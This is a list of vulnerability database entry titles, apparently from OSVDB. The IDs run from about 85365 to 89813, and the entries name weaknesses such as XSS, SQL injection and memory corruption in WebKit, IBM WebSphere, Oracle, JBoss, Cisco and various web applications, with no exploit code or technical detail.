[89813] Sullair eConnect Embedded Web Server Multiple Default Credentials
[89808] WebKit WebCore/loader/MainResourceLoader.cpp JavaScript Timestamp 8-byte Value Read Weakness Memory Disclosure
[89698] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform Insecure Auto-install XML File Admin Password Local Disclosure
[89695] SAP NetWeaver Web Application Server (WebAS) CCMS Service XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
[89694] SAP NetWeaver Web Application Server (WAS) AdapterFramework Servlet Information Disclosure
[89663] WebKit MIME Type Handling PluginData Page Pointer Page Refreshing Use-after-free
[89657] WebKit Cross-Origin Copy Pasted Content Handling XSS
[89656] WebKit Website Handling Unspecified Memory Corruption (2013-0950)
[89655] WebKit Website Handling Unspecified Memory Corruption (2013-0951)
[89654] WebKit Website Handling Unspecified Memory Corruption (2013-0952)
[89653] WebKit Website Handling Unspecified Memory Corruption (2013-0953)
[89652] WebKit Website Handling Unspecified Memory Corruption (2013-0954)
[89651] WebKit Website Handling Unspecified Memory Corruption (2013-0955)
[89650] WebKit Website Handling Unspecified Memory Corruption (2013-0956)
[89649] WebKit Website Handling Unspecified Memory Corruption (2013-0958)
[89648] WebKit Website Handling Unspecified Memory Corruption (2013-0959)
[89647] WebKit Website Handling Unspecified Memory Corruption (2013-0968)
[89646] WebKit Website Handling Unspecified Memory Corruption (2013-0948)
[89645] WebKit Website Handling Unspecified Memory Corruption (2013-0949)
[89629] PHP Weby Directory Software contact.php subject Parameter SQL Injection
[89627] Samba Web Administration Tool (SWAT) Manipulation CSRF
[89626] Samba Web Administration Tool (SWAT) Clickjacking Weakness
[89622] Cisco Network Admission Control (NAC) Web Authentication Function Unspecified XSS
[89609] PHP Weby Directory Software Admin Account Manipulation CSRF
[89599] Cisco WebEx Social Search Functionality Parameter Parsing File Disclosure
[89593] Embedthis Appweb on Windows src/mpr/mprLib.c mprUrlEncode Function Heap-based Overflow
[89590] Siemens SIMATIC WinCC MiniWeb Server Default Administrator Credentials
[89583] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform Multiple Servlet Initial Authentication Bypass
[89582] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform CallerIdentityLoginModule Password Retention Remote Session Hijacking
[89581] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform SecurityAssociation.getCredential() Function Previous Session Credential Disclosure
[89580] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform JMX Invoker Roll Restriction Weakness
[89579] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform Remote Plaintext Symmetric Key Disclosure
[89578] JBoss Enterprise Application Platform / JBoss Enterprise Web Platform JMX Console Unspecified XSS
[89573] WebYaST /host Configuration Path Handling Host List Manipulation
[89567] Perforce P4web Web Client Unspecified Script(s) Multiple Parameter XSS
[89566] WebKit XSS Filter Split Variable Injection Bypass Weakness
[89561] Cisco WebEx Training Center Crafted Request Arbitrary Training-center Recording Manipulation
[89558] Cisco WebEx Training Center Crafted Request Arbitrary Hands-on Lab-session Reservation Deletion
[89518] IBM WebSphere Application Server (WAS) Information Disclosure CSRF
[89517] IBM WebSphere Application Server (WAS) Virtual Member Manager (VMM) Administrative Console Unspecified XSS
[89516] IBM WebSphere Application Server (WAS) Servlet Request Parsing Access Restriction Bypass
[89515] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS (2013-0458)
[89514] IBM WebSphere Application Server (WAS) Administrative Console Unspecified XSS (2013-0459)
[89502] Google Chrome webrtc_audio_renderer.cc WebRtcAudioRenderer::Initialize Function Unsupported RTC Sampling Rate Memory Corruption
[89501] Adult Webmaster /admin/userpwdadfasdfre.txt Direct Request Password Disclosure
[89490] General Electric (GE) Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY WebView CimWeb substitute.bcl Crafted Packet Parsing Traversal Arbitrary File Access
[89489] General Electric (GE) Intelligent Platforms Proficy HMI/SCADA - CIMPLICITY CimWebServer Crafted Packet Parsing Remote Command Execution
[89477] Juniper Junos J-Web Component URL Encoding Heap Buffer Overflow
[89451] Cisco WebEx Training Center Testing Library testingLibraryAction.do Test Deletion CSRF
[89449] Cisco WebEx Social RSS Service Link Unspecified XSS
[89429] RuggedCom Rugged Operating System on LinuX (ROX II) Unspecified Web UI XSS
[89423] Webimage Multiple Script Malformed opt4 Parameter Path Disclosure
[89422] NETGEAR DGND3700 Admin Interface Router URI Traversal Arbitrary File Access
[89407] Foswiki WebSearch Crafted Search String Remote DoS
[89399] Jenkins /WEB-INF/web.xml Direct Request Remote Information Disclosure
[89374] RuggedCom Rugged Operating System (ROS) Unspecified Unauthorized Web-Based Management Authentication Bypass
[89369] Foswiki WebNotify Function Subscribed Trashed Topic Handling DoS
[89362] RuggedCom Rugged Operating System (ROS) IP Stack / Web Server Memory Leak Remote DoS
[89346] SonicWALL Multiple Product SGMS Interface User Password Change Request Handling Admin Password Manipulation
[89325] Barracuda Web Application Firewall Unspecified XSS
[89309] RESTful Web Services Module for Drupal Unspecified CSRF
[89277] NETGEAR Multiple Router Admin Interface Default Credentials
[89231] Oracle Siebel CRM Highly Interactive Web UI Subcomponent Unspecified Remote Information Disclosure
[89207] Oracle Enterprise Manager Grid Control Enterprise Manager Base Platform Component User Interface Framework Subcomponent Unspecified Remote Issue
[89191] Oracle Access Manager OAM Webgate Subcomponent Unspecified Remote Issue
[89190] Oracle WebLogic Server Web Container Subcomponent Unspecified Remote DoS
[89171] IBM Cognos TM1 Web Component Unspecified XSS
[89161] Webimage /webimage/imagemanage.php editobj_name Parameter File Upload Arbitrary Code Execution
[89113] WeBid validate.php Multiple Parameter SQL Injection
[89100] IBM Tivoli Access Manager WebSEAL illegal-url-substrings Feature Unspecified Bypass
[89067] Advantech WebAccess /broadWeb/include/gAddNew.asp ProjDesc Parameter XSS
[89061] IBM WebSphere MQ Advanced Message Security WMQ Message Flow Cleartext Message Disclosure
[89057] General Electric (GE) Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe HTTP Data Parsing Integer Overflow
[89046] Concert Calendar Addon for WebsiteBaker modules/concert/view.php date Parameter XSS
[89045] Concert Calendar Addon for WebsiteBaker modules/concert/view.php date Parameter SQL Injection
[89005] Mozilla Multiple Product Mesa WebGL Canvas Resizing Use-after-free Arbitrary Code Execution
[88961] Microsoft System Center Operations Manager Web Console /InternalPages/ExecuteTask.aspx __CALLBACKPARAM Parameter XSS
[88960] Microsoft System Center Operations Manager Web Console Unspecified XSS (2013-0009)
[88925] Advantech Studio NTWebServer.exe sub_401A90 Routine CreateFileW Function Absolute Path Request Arbitrary File Access
[88898] RuggedCom Rugged Operating System (ROS) / ROX Guest/Operator Web Form Manipulation Privilege Escalation
[88877] Simple Web Server Traversal Arbitrary File Access
[88876] Asterisk HTTP Asterisk Management Interface 'ast_http_get_post_vars' Remote Stack Corruption
[88872] cPanel WebHost Manager (WHM) /webmail/x3/mail/filters/editfilter.html filtername Parameter XSS
[88773] cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS
[88765] Boat Browser for Android WebView Class Crafted Application Information Disclosure
[88764] Opera for Android WebView Class Crafted Application Information Disclosure
[88724] EMC Data Protection Advisor Web UI Traversal Arbitrary File Access
[88719] Novell iPrint Client op-client-interface-version Parameter Unspecified Remote Code Execution
[88659] Kiwi Syslog Telerik.Web.UI.WebResource.axd Multiple Parameter SQL Injection
[88646] Oracle Sun GlassFish Web Space Server Liferay Component Unspecified Traversal
[88638] Jetty on Windows Mixed Case WEB-INF Request Security Bypass
[88629] Sony PC Companion WebServices.dll DownloadURLToFile() Function bstrFile Parameter Stack Overflow
[88624] IBM WebSphere Application Server (WAS) on z/OS HTTP Server Unspecified Remote Command Execution
[88581] Squid Web Proxy HTTP Accelerator Mode Proxied Port Scan Weakness
[88553] IBM Rational Automation Framework (RAF) Web UI Authentication Bypass
[88518] IBM InfoSphere Information Server Web Console Multiple Unspecified Issues
[88515] IBM InfoSphere Information Server Web Console Reporting Simple / Advanced Search XSS
[88503] IBM WebSphere DataPower Integration Appliance Malformed MIME Type Header Processing Remote Device Restart DoS
[88502] IBM WebSphere DataPower Integration Appliance URL-OPEN() Function Malformed URI Handling Device Restart Remote DoS
[88501] IBM WebSphere DataPower Integration Appliance SOAP Message MIME Attachment Handling Race Condition Remote Device Restart DoS
[88500] IBM WebSphere DataPower Integration Appliance MQGET_REPLY MPH Field Handling Remote Device Restart DoS
[88499] IBM WebSphere DataPower Integration Appliance MQ Server Corrupted Binary Message Processing Remote Device Restart DoS
[88498] IBM WebSphere DataPower Integration Appliance Expired Certificate Acceptance Weakness
[88496] Splunk splunkweb Custom App Remote Code Execution
[88482] IBM WebSphere DataPower Integration Appliance Malformed WSDL Code Processing Remote Device Restart DoS
[88481] IBM WebSphere DataPower Integration Appliance SOAP Request 'Validate by Schema Attribute' Action Handling Remote Device Restart DoS
[88480] IBM WebSphere DataPower Integration Appliance ldap-search() Extension Function Remote Device Restart DoS
[88456] Smartphone Pentest Framework androidwebkit.pl Remote Command Execution
[88446] IBM Rational ClearQuest OSLC Interface System Unspecified XSS
[88429] IBM Lotus Notes Web Applications Unspecified XSS
[88428] IBM Lotus Foundations Start Webconfig Users Page Multiple User Attribute Field XSS
[88388] Cisco Wireless LAN Controllers (WLC) /screens/base/web_auth_custom.html headline Parameter XSS
[88386] Cisco Wireless LAN Controllers (WLC) /screens/base/web_auth_custom.html Crafted GET Request Parsing Remote DoS
[88373] WebKit Visibility Event Handling Use-after-free Issue
[88370] Cerberus FTP Server Web Admin /servermanager Messages Tab Multiple Field XSS
[88368] Citrix XenApp XML Service Interface Crafted Packet Parsing Remote Code Execution
[88362] Stoneware WebNetwork blogSearch.jsp blogName Parameter XSS
[88361] Stoneware WebNetwork setAppFlag.jsp flag Parameter XSS
[88360] Stoneware WebNetwork blog.jsp blogName Parameter XSS
[88359] Stoneware WebNetwork calendar.jsp Multiple Parameter XSS
[88259] Incomedia WebSite X5 Evolution /imsearch.php search Parameter XSS
[88258] Incomedia WebSite X5 Evolution /admin/checkaccess.php Authentication Bypass
[88244] BugTracker.NET view_web_config.aspx path Parameter XSS
[88234] BugTracker.NET view_web_config.aspx Response.WriteFile() Function Arbitrary File Disclosure
[88186] Kent Web Access Report Tag Embedding Unspecified XSS
[88185] Kent Web Access Report Access Log Data Unspecified XSS
[88160] IBM WebSphere Portal Theme Component LayerLoader.jsp Traversal Arbitrary File Access
[88116] OurWebFTP index.php Multiple Parameter XSS
[88087] Fortinet FortiWeb /waf/pcre_expression/validate Multiple Parameter XSS
[88061] WebKit Media Source Handling Use-after-free Arbitrary Code Execution
[88057] IBM WebSphere Message Broker Uninstaller File Permissions Local Privilege Escalation
[88047] IBM WebSphere Operational Decision Management RTS Error Page Cause Message XSS
[88042] IBM WebSphere Message Broker Configuration Manager V5 Imported ACL Implementation Failure
[88036] IBM WebSphere Message Broker Unspecified Issue
[88034] IBM WebSphere MQ /var/sadm/pkg/mqm-06-00-02-01/save Permission Weakness Local DoS
[88033] IBM WebSphere MQ Application Process Heap Corruption runmqlsr Listener Remote DoS
[88031] IBM WebSphere MQ reset_iconv_tables Permission Setting Weakness
[88025] IBM WebSphere MQ COM+/MTS Environment Queue Manager Connection Saturation Remote DoS
[88017] Anti-Web HTTPD (awhttpd) Nonexistent File Handling Local DoS
[88004] McAfee Email Gateway Secure Web Mail Client Message Saturation Disk Space Consumption DoS
[87979] Webmail Plus Module for Drupal Unspecified SQL Injection
[87963] IBM WebSphere Operational Decision Management Decision Center action.jsp Arbitrary Project Deletion
[87958] IBM WebSphere Message Broker ProxyServlet / MQ HTTP Connection Cleartext Credential Disclosure
[87956] IBM WebSphere DataPower Integration Appliance Multi-Protocol Gateway / Web Service Proxy Crafted Message Handling Remote Device Restart DoS
[87954] IBM WebSphere Operational Decision Management ILOG Rule Team Server Decision Center /teamserver/faces/home.jsp project Parameter Unspecified Issue
[87950] JBoss Enterprise Portal Platform Web Services W3C XML Encryption Standard Implementation CBC Mode SOAP Response Chosen-ciphertext Attack
[87944] IBM WebSphere MQ Unspecified Issue
[87942] IBM WebSphere Message Broker HTTP Request Node Handling Remote Overflow
[87937] IBM WebSphere MQ /opt/mqm/ssl/jre/javaws/javaws Permission Weakness Local Privilege Escalation
[87936] IBM WebSphere MQ /opt/mqm/licenses Permission Weakness Local Privilege Escalation
[87935] IBM WebSphere Message Broker Java User Defined Node (UDN) Handling Remote Overflow
[87934] IBM WebSphere Message Broker ConfigManagerProxy trace.txt Symlink Local Privilege Escalation
[87933] IBM WebSphere MQ Java Message Service (JMS) Class Password Truncation Weakness
[87930] IBM WebSphere Message Broker for z/OS Configuration Manager Non-primary Group ACL Implementation Failure
[87923] AR Web Content Manager (AWCM) Comment Record Saturation Remote DoS
[87922] AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness
[87919] IBM WebSphere DataPower Integration Appliance Empty SubjectKeyID Certificate Display Weakness
[87913] IBM WebSphere DataPower Integration Appliance SSL Proxy DNS Resolution Timeout Device Restart DoS
[87912] IBM WebSphere DataPower Integration Appliance Service Probe Malformed WSDL Element Handling Device Restart DoS
[87911] IBM WebSphere DataPower Integration Appliance Malformed S/MIME Message Header Handling Remote Device Restart DoS
[87903] IBM WebSphere DataPower Integration Appliance SwA / MTOM Message Handling Remote Device Restart DoS
[87902] IBM WebSphere DataPower Integration Appliance Multiple Condition Stylesheet Processing Remote Device Restart DoS
[87901] IBM WebSphere DataPower Integration Appliance IMS Connect Handler Request Saturation Remote Device Restart DoS
[87897] IBM WebSphere DataPower Integration Appliance SFTP Log Target Welcome Banner Handling Remote Device Restart DoS
[87886] Google Chrome PrintWebViewHelper::PrintNode() Function Use-after-free Issue
[87885] Google Chrome WebElement::hasHTMLTagName Function Input Element Handling Bad Cast Issue
[87884] WebKit SVG Filter feImage Element Self-reference Processing Use-after-free
[87867] Websense Crafted GET Request URL Filter Bypass
[87860] Beat Websites page_detail.php id Parameter SQL Injection
[87840] playSMS inc/app/webservices.php Arbitrary User SMS Message Sending Weakness
[87833] Zingiri Web Shop Plugin for WordPress /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php path Parameter File Upload Arbitrary Code Execution
[87832] Webplayer Plugin for WordPress wp-content/plugins/webplayer/config.php id Parameter SQL Injection
[87809] WeBid Arbitrary Code Execution CSRF
[87808] WeBid admin/settings.php Your copyright message Field XSS
[87807] WeBid loader.php js Parameter Traversal Arbitrary File Access
[87802] WeBid converter.php AMOUNT Parameter XSS
[87801] WeBid profile.php auction_id Parameter XSS
[87800] WeBid friend.php Multiple Parameter XSS
[87799] WeBid register.php TPL_nick Parameter XSS
[87796] ownCloud /apps/user_webdavauth/settings.php Unspecified XSS
[87793] Webform CiviCRM Integration Module for Drupal Enforce Permissions Weakness
[87782] libunity-webapps Unspecified Use-after-free Arbitrary Code Execution
[87721] IBM WebSphere Application Server (WAS) EJB Feature Pack Property File Plaintext Password Local Disclosure
[87715] Serv-U FTP Server Web Client Unspecified XSS
[87701] Website Photo Gallery (jm_gallery) Extension for TYPO3 Multiple Unspecified SQL Injection
[87624] BIGACE Web CMS Unspecified Session Fixation
[87620] IBM WebSphere DataPower XC10 Admin Operation JMX Handling Remote Command Execution
[87611] Google Web Toolkit (GWT) Tree[Item].addItem / insertItem(String html) Function XSS
[87610] Google Web Toolkit (GWT) Unspecified XSS
[87601] Mozilla Multiple Product webgl bufferdata Handling Overflow
[87571] IBM WebSphere Portal Theme Component Unspecified URL Manipulation Issue
[87570] Splunk Web Component Non-RFC Compliant Browser Unspecified XSS
[87569] Splunk Web Component Unspecified XSS (SPL-55157)
[87564] Sophos UTM WebAdmin Login Screen Last Webadmin Sessions Unspecified XSS
[87550] Media Player Classic (MPC) WebServer browser.html path Parameter XSS
[87549] Media Player Classic (MPC) WebServer Request Handling Remote DoS
[87548] Adobe InDesign Server SOAP Interface RunScript SOAP Message Parsing Remote Command Execution
[87521] WebKit html/parser/XSSAuditor.cpp String Parsing XSS Protection Bypass Weakness
[87508] Bugzilla /WebService/User.pm User.get Method Arbitrary User Saved Search Remote Information Disclosure
[87440] Sybase EAServer Web Services Toolkit XML Parser Unspecified DoS
[87407] RESTful Web Services Module for Drupal Unspecified CSRF
[87341] IBM WebSphere Application Server (WAS) Liberty Profile Unspecified URI XSS
[87340] IBM WebSphere Application Server (WAS) Liberty Profile JAX-RS Request Validation Remote Privilege Escalation
[87339] IBM WebSphere Application Server (WAS) Information Disclosure CSRF
[87338] IBM WebSphere Application Server (WAS) Crafted Request Parsing Remote DoS
[87266] Microsoft .NET Framework Web Proxy Setting Auto-Discovery (WPAD) Handling Remote Code Execution
[87249] icedtea-web IcedTeaScriptablePluginObject.cc invoke() Function Applet Event Exception Message Handling Overflow
[87244] IBM WebSphere MQ Queue Manager Asynchronous Customer Message Parsing Remote DoS
[87230] FreeWebshop index.php Multiple Parameter SQL Injection
[87229] FreeWebshop index.php searchfor Parameter XSS
[87228] FreeWebshop setlang.php redirect_to Parameter XSS
[87180] Weberknecht X.509 Certificate Domain Name Matching MitM Weakness
[87136] VeriCentre WebConsole/terminal/paramedit.aspx Multiple Parameter SQL Injection
[87102] Opera WebP Image File Handling Out-of-bounds Read Information Disclosure
[87079] Google Chrome WebP Image File Handling Out-of-bounds Read Information Disclosure
[87050] Webmin Real Name Field XSS
[87049] XBMC Web Server Encoded Traversal Arbitrary File Access
[87044] IBM WebSphere DataPower XC10 / eXtreme Scale Server-to-Server Hardcoded Secret Token
[87043] IBM WebSphere DataPower XC10 / eXtreme Scale Server-to-Server Secret Token Cleartext Disclosure
[86873] WebKit JavaScript Array Handling Race Condition Arbitrary Code Execution
[86859] Cisco Unified MeetingPlace Web Conferencing Component HTTP POST Request Parsing Remote Overflow DoS
[86858] OrangeHRM /symfony/web/index.php sortField Parameter SQL Injection
[86834] VOlk-Botnet Visit Webpage Open URL Bots: Field XSS
[86797] Juniper Junos Missing Client-match Statement Web-authentication Policy Enforcement Weakness
[86754] Easy Webinar Plugin for WordPress get_widget.php wid Parameter SQL Injection
[86722] Come on Girls Interface (CGI) Tokyo BBS tokyo_bbs.cgi Error Page XSS
[86687] MailChimp Module for Drupal Watchdog Logging webhook Type XSS
[86583] libsocialweb services/flickr/flickr.c Flickr Service SSL Certificate Validation MitM Weakness
[86570] Mutiny Unspecified Network Interface Menu Remote Command Execution
[86501] Samsung Kies CmdAgent.dll ICommandAgent Interface Multiple Method Remote Privilege Escalation
[86431] BTicino Legrand Home Gateway TiWeb.xml Direct Request Admin Credential Disclosure
[86413] Logica HotScan Listener Interface Crafted Packet Parsing Remote Overflow
[86373] Oracle Business Intelligence Enterprise Edition /em/console/help/webapp/HELP_10.1.3_NT_060914.0911.178/ohw_jslibs/vt_chrome.js URI XSS
[86348] Oracle Java SE / JRE Web Start Component JNLP File Multiple Parameter Double Quote Handling Arbitrary Code Execution
[86325] Oracle Agile PLM Framework Web Client (CS) Subcomponent Unspecified Remote Issue
[86301] Oracle WebCenter Sites ImagePicker Subcomponent Unspecified Local Issue
[86300] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer Multiple Parameter XSS
[86299] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer selectedLocale Parameter SQL Injection
[86298] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer Arbitrary User Password Manipulation CSRF
[86297] Oracle WebCenter Sites Advanced UI Subcomponent /cs/ContentServer Arbitrary User Email Address Manipulation
[86296] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Information Disclosure (2012-0095)
[86295] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Information Disclosure (2012-0108)
[86294] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0092)
[86293] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0090)
[86292] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Information Disclosure (2012-0086)
[86291] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote DoS
[86290] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0093)
[86289] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0071)
[86288] Oracle Imaging and Process Management Web Subcomponent Unspecified Remote Issue (2012-0106)
[86244] SpamTitan WebTitan urls-x.php Multiple Parameter SQL Injection
[86243] SpamTitan WebTitan login-x.php username Parameter SQL Injection
[86242] SpamTitan WebTitan logs-x.php fname Parameter Traversal Arbitrary File Access
[86241] SpamTitan WebTitan tools.php Argument Shell Metacharacter Remote Command Execution
[86215] WebCalendar view_entry.php Multiple Parameter XSS
[86169] Web Help Desk Ticket System Multiple Field XSS
[86168] Web Help Desk Rejected Email XSS
[86164] Basic webmail Module for Drupal Page Title XSS
[86163] Basic webmail Module for Drupal Permission Weakness User Email Disclosure
[86162] Basic webmail Module for Drupal Emails XSS
[86149] WebKit SVGElementInstance::detach Function Use-after-free Arbitrary Code Execution
[86143] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3938)
[86142] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3937)
[86141] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3936)
[86140] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3941)
[86139] Cisco WebEx Recording Format Player Unspecified WRF File Handling Overflow (2012-3940)
[86138] Cisco WebEx Recording Format Player Unspecified WRF File Handling Memory Corruption
[86130] Siemens SIMATIC S7-1200 Web Server Component Unspecified XSS
[86065] Xataface WebAuction / Librarian DB index.php Multiple Parameter XSS
[86064] Xataface WebAuction / Librarian DB index.php lang Parameter Traversal Arbitrary File Access
[86063] Xataface WebAuction / Librarian DB index.php Malformed -action Parameter Path Disclosure
[86062] Xataface WebAuction / Librarian DB index.php table Parameter SQL Injection
[86052] webERP WorkOrderEntry.php FormID Parameter SQL Injection
[86023] Akiva WebBoard Admin Profile HTML Source Administrator Cleartext Password Disclosure
[86015] EasyWebRealEstate listings.php lstid Parameter SQL Injection
[86014] EasyWebRealEstate index.php infoid Parameter SQL Injection
[85994] Final Beta Laboratory MyWebSearch keywords Parameter XSS
[85983] SAP NetWeaver Mobile Infrastructure Web Console Unspecified XSS
[85976] xClick Cart webscr.php shopping_url Parameter XSS
[85971] WireShark Remote Interface Addition Multiple Field Overflow
[85963] web@all /webatall/sys/index.php _order Parameter SQL Injection
[85962] web@all /webatall/sys/action.php Multiple Parameter XSS
[85960] WebPA Crafted Cookie Parsing Authentication Bypass
[85944] Wiki Web Help Node Option Addition New Page Name Field XSS
[85943] Wiki Web Help Edit Tags Tags Field XSS
[85938] Wiki Web Help Page Body XSS
[85922] Dart Communications DartWebserver.Dll Web Request Parsing Remote DoS
[85890] GNOME gnome-shell Crafted Web Page Plugin Arbitrary Extension Installation
[85868] IBM WebSphere Commerce Unspecified Profile Data Disclosure
[85867] IBM Rational Business Developer Web Services Unspecified Remote Information Disclosure
[85837] IBM Net.Commerce / WebSphere Password Encoding Weakness
[85819] jigbrowser+ Application for Android WebView Class Implementation Application Handling Information Disclosure
[85801] Novell GroupWise Agent HTTP Interface Traversal Arbitrary File Access
[85800] Novell GroupWise WebAccess Component HTML Email Signature XSS
[85789] Cisco Secure Desktop (CSD) WebLaunch Functionality Arbitrary Code Execution
[85775] WebKit Frame Element Handling Universal XSS
[85771] WebKit SVG Text Reference Handling Use-after-free Issue
[85759] WebKit ContainerNode::replaceChild Bad DOM Topology DoS Weakness
[85753] Google Chrome IPC Print Preview WebUI Memory Address Disclosure Weakness
[85741] IBM WebSphere Commerce Enterprise REST Services Framework Unspecified Access Restriction Bypass
[85740] IBM WebSphere Commerce Enterprise Persistent Session / Personalized ID Handling Resource Consumption Remote DoS
[85735] IBM WebSphere Application Server (WAS) for z/OS CBIND Check Handling Local Data Manipulation
[85734] IBM WebSphere Application Server (WAS) Authentication Cache Password Purging Failure
[85733] IBM WebSphere Application Server (WAS) Unspecified Remote Session Hijacking
[85732] IBM WebSphere Application Server (WAS) Unspecified Traversal Arbitrary File Overwrite
[85728] IBM WebSphere MQ Server Message Channel Agent Address Alignment Exception Handling Remote DoS
[85714] SilverStripe code/sitefeatures/PageCommentInterface.php User Comment Submission Cookie Deserialization Handling Remote Code Execution
[85664] Novell GroupWise WebAccess Component Search Document Form merge Parameter XSS
[85651] Apple Mac OS X Profile Manager Device Management Private Interface Managed Device Enumeration
[85648] Apple Mac OS X Email Message Handling Web Plugin Execution
[85633] Apple iOS UIKit UIWebView Unencrypted File Disclosure
[85631] WebKit Unspecified Memory Corruption (2012-3747)
[85605] Cybozu KUNAI Browser for Remote Service Application Beta for Android WebView Class file: URL Application Handling Arbitrary Code Execution
[85590] Uebimiau Webmail Address Book Name Field XSS
[85589] Uebimiau Webmail readmsg.php Email Subject XSS
[85558] LuxCal Web Calendar pages/phpinfo.php Direct Request Information Disclosure
[85557] LuxCal Web Calendar lcaldbc.dat Direct Request Encrypted Information Disclosure
[85556] LuxCal Web Calendar index.php cD Parameter XSS
[85555] LuxCal Web Calendar dloader.php fName Parameter Traversal Arbitrary File Access
[85550] Moodle webservice/lib.php External Service Token Cross-service Usage Weakness
[85541] Barracuda Web Filter Authentication Functionality Multiple Field XSS
[85507] IlohaMail Webmail Bookmark Functionality Multiple Field XSS
[85506] IlohaMail Webmail E-mail Body XSS
[85504] T-dah WebMail addressbook.php New Contact Creation CSRF
[85498] IceWarp Mail Server WebMail Component webmail/pda/controller/raw.php phpinfo() Function PHP Configuration Information Disclosure
[85495] Webmin file/show.cgi Authentication Credential Hijack CSRF
[85489] Cybozu KUNAI for Android WebView Class file: URI XSS
[85475] Eucalyptus Cloud Controller / Walrus SOAP Web Service Components Authorization Mechanism Authentication Bypass
[85473] Eucalyptus Cloud Controller / Walrus SOAP Web Service Components Internal Format Message Submission Credential Validation Remote Privilege Escalation
[85469] T-dah WebMail addressbook.php Multiple Field XSS
[85468] T-dah WebMail Calendar Event Message Field XSS
[85467] WeBid admin/logout.php include_path Parameter Remote File Inclusion
[85466] WeBid getthumb.php w Parameter Traversal Arbitrary File Access
[85416] WebKit 'HTMLAppletElement::renderWidgetForJSBindings' Function Inline Applet Bad Cast Memory Corruption
[85415] WebKit SVGElement::isOutermostSVGSVGElement Shadow Tree Parent Confusion Memory Corruption
[85414] WebKit Unspecified Memory Corruption (2012-3602)
[85413] WebKit :first-letter Pseudo Element Floats Handling Use-after-free Issue
[85412] WebKit 'ApplyStyleCommand::joinChildTextNodes' Function Use-after-free Issue
[85411] WebKit Paragraph Separator Insertion Use-after-free Issue
[85410] WebKit 'ReplaceSelectionCommand::performTrivialReplace' Function Use-after-free Issue
[85409] WebKit Object Element Reattaching Content Comparison Memory Corruption
[85408] WebKit CSS Parser Incomplete ':not' Selector Memory Corruption
[85407] WebKit 'AccessibilityRenderObject::contentChanged' Function Use-after-free Issue
[85406] WebKit 'swapInNodePreservingAttributesAndChildren' Function Use-after-free Issue
[85405] WebKit Element::setAttributeInternal Hidden Input Type Switching Use-after-free Issue
[85404] WebKit Inline Box For Floating / Position Objects In Isolates Creation Use-after-free Issue
[85403] WebKit Unspecified Memory Corruption (2012-3649)
[85402] WebKit Unspecified Memory Corruption (2012-3648)
[85401] WebKit CharacterData::setData Text Node DOMCharacterDataModified Event Handling Use-after-free Issue
[85400] WebKit Orphan Tree Parent Node With Child Deletion Use-after-free Issue
[85399] WebKit Unspecified Memory Corruption (2012-3632)
[85398] WebKit Paragraph Separator Insertion Use-after-free Issue
[85397] WebKit 'CompositeEditCommand::breakOutOfEmptyListItem' Function Use-after-free Issue
[85396] WebKit 'DragController::concludeEditDrag' Function Use-after-free Issue
[85394] WebKit Fixed Position Element Handling Memory Corruption
[85393] WebKit Cached Image Handling Use-after-free Issue
[85392] WebKit Unspecified Memory Corruption (2012-3709)
[85391] WebKit Document::removedLastRef Document Cleanup Use-after-free Issue
[85390] WebKit SVG Intersection List Handling Use-after-free Issue
[85389] WebKit SVGSMILElement::svgAttributeChanged Dynamic attributeName Modification Use-after-free Issue
[85388] WebKit Shadow DOM Subtree Event Dispatching Memory Corruption
[85387] WebKit SVGAnimatedPropertyTearOff Deletion Use-after-free Issue
[85386] WebKit Unspecified Memory Corruption (2012-3703)
[85385] WebKit XHR Multiple Cancel/Restart Re-entrancy Use-after-free Issue
[85384] WebKit Cross-Origin Video Posting Use-after-free Issue
[85382] WebKit Unspecified Memory Corruption (2012-3700)
[85381] WebKit AudioNodeOutput::disconnectAllParams Audio Node Handling Use-after-free Issue
[85380] WebKit RenderObject::containingBlock Absolute Positioned Object Handling Use-after-free Issue
[85379] WebKit 'RenderObject::absoluteBoundingBoxRect' Function Use-after-free Issue
[85378] WebKit Unspecified Memory Corruption (2012-3687)
[85377] WebKit Unspecified Memory Corruption (2012-3685)
[85376] WebKit 'StyleResolver::styleForElement' Function Dynamic Title Setting Memory Corruption
[85375] WebKit Unspecified Memory Corruption (2012-3677)
[85374] WebKit 'RenderTableCol::isChildAllowed' Function Table Column Display Handling Memory Corruption
[85373] WebKit Progress Element Run-in Displaying Memory Corruption
[85372] WebKit 'RenderBlock::layoutInlineChildren' Function Use-after-free Issue
[85371] WebKit 'RenderBlock::updateFirstLetterStyle' Function Use-after-free Issue
[85370] WebKit 'RenderObject::setAncestorLineBoxDirty' Function Use-after-free Issue
[85369] WebKit Unspecified Memory Corruption (2012-3660)
[85368] WebKit Scrollbar Handling Use-after-free Arbitrary Code Execution
[85367] WebKit 'RenderBlock::blockBeforeWithinSelectionRoot' Function Memory Corruption
[85366] WebKit 'RenderBlock::splitBlocks' Function Elements Splitting Use-after-free Issue
[85365] WebKit Unspecified Memory Corruption (2012-3651)
